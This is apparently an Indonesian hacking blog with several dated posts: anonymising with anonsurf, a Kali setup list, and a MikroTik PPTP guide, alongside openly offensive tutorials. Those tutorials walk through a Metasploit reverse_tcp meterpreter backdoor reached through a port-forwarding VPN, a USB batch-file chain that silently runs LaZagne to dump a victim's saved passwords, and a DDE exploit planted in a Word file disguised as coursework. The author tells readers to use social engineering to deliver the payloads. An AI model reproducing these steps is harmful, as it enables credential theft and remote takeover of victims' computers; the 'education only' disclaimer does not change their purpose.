Kamis, 28 Desember 2017

Cara Hide IP di Kali Linux Dengan Anonsurf

Hallo, kali ini gw mau share cara anonymous searching di internet.

Sebenarnya ada banyak cara untuk kita agar bisa anonim saat berinternet, gw baru tau beberapa doang, kalian bisa pake VPN, VPS / RDP, Proxychain dll.

Nah, gw pake tools anonsurf di kali linux

pertama kalian clone atau download dulu toolsnya di 

https://github.com/Und3rf10w/kali-anonsurf


  
Setelah di download, masuk ke folder kali-anonsurf

  #cd kali-anonsurf/

Kemudian setting permission pada installer.sh

  #chmod +x  installer.sh

Kemudian install

  #./installer.sh



Ok, setelah install berhasil jika ingin melihat perintahnya ketikan

  #anonsurf help

Nanti akan muncul perintah-perintahnya



Cara menggunakannya:

Cek IP publik kalian, bisa dengan perintah ini

  #anonsurf myip 

atau pergi ke whatismyip.com 

Nanti akan muncul IP publik kalian, lalu untuk menjalankanya ketik perintah berikut diterminal

  #anonsurf start

Maka nanti setip beberapa detik sekali IP publik kita berubah


Dan untuk mematikannya hanya ubah start jadi stop udah itu aja

#thanks  

NB: Semua artikel yg tercantum di http://www.tylexit.tk/ adalah sekedar pengetahuan dan edukasi. Penyalahgunaan di luar tanggung jawab kami

Rabu, 20 Desember 2017

Langkah Yang Harus Dilakukan Setelah Install Kali Linux

Hello World....


Ini hanya catatan saya pribadi, biasanya setelah install kali linux saya lekukan beberapa settingan sebagai berikut:
  1. Setting Tampilan Panael Linux 
  2. Settingan tweak tool
  3. Touchpad + Shortcut Keyboard (Terminal)
  4. Menambah repository
  5. Update dan Upgrade repository
  6. Install paket dari repo debian
  7. Install paket vpn
  8. Dowload & copy dde_delivery + eternalblue_doublepulsar + veil-evasion +  Ngrok
  9. Install virtualbox + ext-pack dan seting host only buat vbox
  10. Intall paket bug fluxion
  11. Install beelogger 
  12. Checkking wine version  + install baru
  13. Install xampp
  14. Install figlet buat mempercantik terminal biar gak garing
 Oke, sekarang ini settingan desktop saya


Saya pake desktop gnome default kali linux, untuk iconnya saya pakei gnome-brave, bisa disetting lewat tweak tool. Untuk panel saya sengaja taruh di bottom biar familiar aja.

Kemudian setting shortcut untuk buka terminal, dan setting touchpad tap to click. Lanjut, saya tambahkan repository di /etc/apt/sources.list 

Repo :
  • deb http://ftp.de.debian.org/debian jessie main
  • deb http://http.kali.org/kali kali-rolling main contrib non-free
Kemudian install paket dari repo debian untuk pakrt tambahan
contoh : libpng12-0 mingw-w64 php5-cgi

install paket vpn untuk private surfing

apt install network-manager-vpnc-gnome
apt install network-manager-openvpn-gnome
apt install network-manager-pptp-gnome

apt install network-manager-pptp 
apt install network-manager-strongswan
apt install network-manager-vpnc


Install beelogger 
  • git clone https://github.com/4w4k3/BeeLogger
Sisanya yah gitu lah, intinya ini catatan aja biar gak lupa

thanks

Sabtu, 16 Desember 2017

Backdoor Beda Jaringan Metasploit + VPN Ipjetable

Hallo, selamat malam...
Waduh apa cuma gw yg malam minggunya ngeblog.?wkwkwk
Oke, kali ini gw mau share cara membuat rat lagi.

Kali ini metodenya dengan memakai VPN yang support port forwarding, dengan begini maka ip lokal kita bisa bebas keluar masuk melalui port yg open.

Oke next ke caranya aja,
Pertama install dulu vpnnya

apt install network-manager-vpnc-gnome
apt install network-manager-openvpn-gnome
apt install network-manager-pptp-gnome

apt install network-manager-pptp 
apt install network-manager-strongswan
apt install network-manager-vpnc

/etc/init.d/network-manager restart  

Pertama kita buka Temp Email


Kemudian kalian buka link Free Proxy kemudian ketik ipjetable.net dan klik unblock


 
Setelah masuk kemudian klik Je m'inscris dan registrasi dengan email yg didapat dari temp mail

 
Jika berhasil maka akan muncul tampilan Merci! warna hijau


Dan kita dapat email dari ipjetablenya, kemudian kalian buka emailnya


Kemudian copy link yang panjangnya,  dan di bawahnya ada username dan password untuk login vpn nantinya


Kemudian buka lagi Free Proxy dan paste di situ kemudian klik unblock


 Kemudian isi username dan password yg didapat dari email tadi


Jika berhasil maka kalian akan berhasil login vpn ipjetable, setelah itu kalian pergi ke network settings dan klik tombol + / add dan pilih PPTP, kemudian isi nama, gateway, user dan passwordnya, klik advanced dan ceklis pada checkbox Use Point-to-point Encryption (MPPE) dan klik add kemudian konekin. Kurang jelas liat gambar, cape gw ngetiknya kwkwkwk...











Oke mhank, kalo udah connect sekarang tinggal ngecek port yang mau kita gunakan, apakah bisa diforward atau tidak. Caranya, buka canyouseeme.org kemudian masukan port yang mau kita forwarding


Disini gw pake port 4455, kemudian klik check port, jika berhasil maka akan tampil notifikasi warna success warna hijau seperti gambar berikut


Tapi kalau seperti ini, berarti port forwarding gagal



Buka terminal kalian dan cek dengan netcat apakah port yg kalian gunakan bisa diforward atau tidak dan sekaligus membuka koneksi portnya. Gunakan perintah ini

#nc -vlp 4455


  
Dan chek port ulang, pasti berhasil, kalau gagal troubleshoot sendiri atau komen di bawah. Sampai disini kita sudah bisa mengunakan portnya untuk membuat RAT sekaligus exploitasi wkwkwkkw

Dan untuk membuat RAT dan exploitasinya silahkan gunakan IP Public untuk LHOST dan untuk LPORT silahkan pakai port yang sudah di forward tadi, kemudian lakukan soceng untuk kirim backdoor (gunakan otak kalian) dan exploit dah, pasti jadi gw jamin.
Neeh gw kasih SS, gw males ngetiknya asli, kwkwkwkkw
   






  Okeh, sampai disini tutorial sungkranya 
Kalau kurang jelas silahkan komen, subscribe untuk update terbaru atau kirim pertanyaan lewat form contact kalau mau private message

NB: Semua artikel yg tercantum di http://www.tylexit.tk/ adalah sekedar pengetahuan dan edukasi. Penyalahgunaa di luar tanggung jawab kami
 

Senin, 11 Desember 2017

Cara Mencuri Password Menggunakan Flashdisk

Selamat malam rakyat,
Kali ini gw mau sharing tentang pentesting sederhana neeh. Yah seperti judulnya, tapi gak sangar-sangar banget sih, kalo judulnya kan ngeri tuh Mencuri Password, padahal bukan mencuri sih, hanya sedikit memanfaatkan kelalaian user

Oke langsung aja
Eh, bentar deh saya jelasin sedikit, gw demo tutorialnya pake software orang yang namanya LaZagne, setau gw LaZagne ini bekerja dengan cara memanfaatkan cookies yang tersimpan di device korban, sehingga attacker dapat mengetahui sedikit username, password dan situs tempat username serta password itu berasal meskipun tidak semuanya.

Next
Bahan
  •  Flashdisk kosong
  •  LaZagne.exe (Download sendiri, Usaha)
Caranya 
Buat folder di dalam flashdisk dengan nama bebas, gw bikin nama foldernya Laporan, didalam folder laporan gw bikin folder Tugas. Selanjutnya buka notepad dan ketikan code berikut

  @echo off
  cls
  cd Tugas/Laporan
  start control.bat

Simpan di dalam flashdisk di luar folder dengan nama start.bat dan type all files, kemudian buka notepad lagi dan ketikan code berikut

  @echo off
  cls
  start run.bat

Simpan dengan nama control.bat dan taruh di flashdisk di folder Laporan > Tugas > control.bat
Buka lagi notepadnya dan ketikan code berikut

  start LaZagne.exe > output.txt

Simpan dengan nama run.bat dan taruh di dalam flashdisk, di folder Laporan > Tugas > run.bat
Kemudian copy LaZagne.exe yang sudah di download tadi didalam flashdisk, di folder Laporan > Tugas > LaZagne.exe

Ket. 
  1. File start.bat adalah file yang dibuat untuk menjalankan LaZagne.exe agar tidak ketauan bahwa kita sedang mejalankan program LaZagne di dalam flashdik
  2. File control.bat adalah file yg dibuat untuk menjembatani file run.bat yang akan mengeksekusi LaZagne.exe dan membuat file output dengan nama yg telah di tentukan
Nahsekarang tancapkan flashdisk pada pc korban dan jalankan start.bat kemudian tunggu programnya berjalan sampai selesai


Nah jika sudah selesai maka akan keluar file output yg telah kalian setting sebelumnya, dan didalam folder ini ada username login dan password  yg didapat dari cookies yang tersmpan di pc korban


Gw juga buat tutor videonya nih



Ok, Thanks 

NB: Semua artikel yg tercantum di http://www.tylexit.tk/ adalah sekedar pengetahuan dan edukasi. Penyalahgunaa di luar tanggung jawab kami

Jumat, 08 Desember 2017

Exploit Windows Via DDE Vulnerability

Hallo pemirsa,
selamat malam, salam sejahtera untuk kita semua, wkwkwkwk dah kaya pejabat aja yah.
kali ini gw mau sharing cara exploit windows via dde vuln, ini ilmu lama sih, tapi gak ada kata kadaluarsa dalam mencari ilmu, yg kadaluarsa itu otak loe.

next gak usah bertele-tele...
Pertama siapkan bahan
  • Kali Linux OS
  • Metasploit
  • script dde_vulnerability.rb (plugin)
Next
Kita download dulu plugin metasploitnya, caranya gini nih

  #git clone Link Ini

Link aslinya liat gambar, kalo diatas itu mirror


Kemudian copy file yang tadi di unduh,

  #cp /usr/share/metasploit-framework/modules/exploits/windows/

Kalo udah di copy, buka metasploit

  #msfconsole

Kemudian set seperti ini

  #use exploit/windows/dde_vulnerability

  #set payload windows/meterpreter/reverse_tcp

  #set lhost (ip private loe)

  #set lport (bebas asal kosong)

  #run

Nah, nanti akan nongol kode exploitnya setelah di runing, copy codenya



Setelah itu buka microsoftwordnya versi berapa aja yg jadi? mana gw tau, kalo gw nyoba di versi10, ini gw pake vbox buat buka ms wordnya sekalian buat jadi tergetnya, kalo mau exploit beneran yah kalian set aja dulu seperti ini

Buka ms word kemudian klik Insert > Quick Parts > Field ...



nanti akan muncuk kotak baru, klik oke aja.


Muncul tuliasan !unexpected end of formula, klik kanan pada tulisan itu, kemudian pilih Toggle field coders

Maka muncul kode, ganti kode di dalam kurung kurawal dengan kode yang didapat dri kode running metasploit tadi, pastekan disitu.



Simpan filenya dengan nama bebas. Kalo disini gw kasih nama tugas kuliah, biar memikat korban wkwkwk


Sejauh ini payload sudah disuntik kedalam bug ms word.

Untuk mengexploitasi meterpreternya, tunggu korban membuka file Backdoor kita. Syarat untuk exploitasinya korban harus ngeklik yes 3x ketika muncul notifikasi saat membuka backdoornya dan harus ngetik apa aja di page ms wordnya



Nah suksessdeh exploitnya, kalo dah dapet meterpreternya ya terserah mau di apain wkwkwk


Kalo meterpreter running di background ketik perintah 

  #sessions -l

     #sessions -i 1

Ket. 1 adalah Id meterpreternya




NB: Semua artikel yg tercantum di http://www.tylexit.tk/ adalah sekedar pengetahuan dan edukasi. Penyalahgunaa di luar tanggung jawab kami

Senin, 04 Desember 2017

Cara Setting VPN PPTP di Mikrotik

Hallo guys, 

kali ini gw mau share gimana cara buat VPN PPTP Server di Mikrotik, yah mungkin temen" udah pada bisa, karena cara ngonfignya gampang banget. Untuk membuat VPN Tunneling, syara wajibnya kita harus punya IP publik static, kita asumsikan kalian dah punya semua (IP Publik dapet dari ISP masing-masing) ok 

studi kasus:
Ada dua gedung kantor A dan kantor B yg mana didalamnya terdapat  jaringan komputer. namun kedua gedung memiliki jarak yg cukup jauh, sedangkan masing-masing jaringan dari tiap kantor harus saling terhubung.
Topologinya:
Dari topologi di atas maka dapat dilakukan konfigurasi sebagai berikut: 
  • Konfigurasi Mikrotik Server
Saya anggap kalian sudah konfig ip di mikrotik sebelumnya, karena di tutorial ini gw cuma jelasin cara buat vpn servernya doang.
pertama kita buat VPN PPTP Servernya,kalian masuk ke mikrotiknya via winbox, kalo udah login,
pergi ke  PPP > Interfaces > Add +
Kemudian klik pada checkbok Enable


Sejauh ini VPN Server sudah aktif, namun user masih belum bisa konek, agar user bisa konek, kita konfig IP di PPPnya
pergi ke PPP > Secrets > Add
    Name                : Bebas
    Password            : Bebas
    Services            : Any (biarkan default)
    Profile             : Default-Encryption (biarkan default)
    Local Address       : IP Bebas
    Remote address      : IP Bebas (harus satu range)

    Catatan:
    1. IP Local Address adalah IP vpn servernya, IP ini tidak sama dengan   ether manapun, artinya vpn server juga punya IP.
    2. IP Remote Address adalah IP yang akan diberikan untuk 1 user vpn saja.
    • Konfigurasi Mikrotik Client
    Oke, sekarang tinggal konfig buat mikrotik client biar bisa konek ke VPN server dengan username dan password yang telah kita setting di mikrotik server.

    Pergi ke ppp > interfaces > add + >Kemudian lakukan Dial Out ke mikrotik server.

    Ket.
    • Conect To : Isikan dengan IP public mikrotik vpn server
    • User : Isi dengan user yang telah di setting di mikrotik server (yg pas di screet tuh, baca lagi diatas)
    • Password : sama kek user
    • Profile : Di isi dengan default-encryption
    • Ceklis semua pilihan di checkbox
    Selanjutnya kita lakukan static routing, agar jaringan client pada mikrotik client dan mikrotik server bisa saling terhubung, dengan cara memasukan local address dan gateway mikrotik server ke dalam settingan IP Route mikrotik client, begitupun sebaliknya.
    caranya liat ss aja nih di bawah
    Pada Mikrotik Server:
    Dst. Address: Network jaringan local pada mikrotik client
    GAteway: Ip vpn mikrotik client 

    Pada Mikrotik Client:
    Dst. Address: Network jaringan local pada mikrotik server
    GAteway: Ip vpn mikrotikserver

    Nah kalo sudah tinggal tes ping kedua mikrotik apakah sudah terhubung atau belum. Tapi disini kalo ada client vpn lain selain mikrotik client (misalnya android / laptop) maka kita harus kasih lagi user dan password di pengaturan scret mikrotik servernya, tapi ada caranya kok, biar gak usah nambah manual satu-satu, tunggu aja post berikutnya

    Oke sekian dari saya 
    semoga bermanfaat, jika kurang jelas jangan malu bertanya.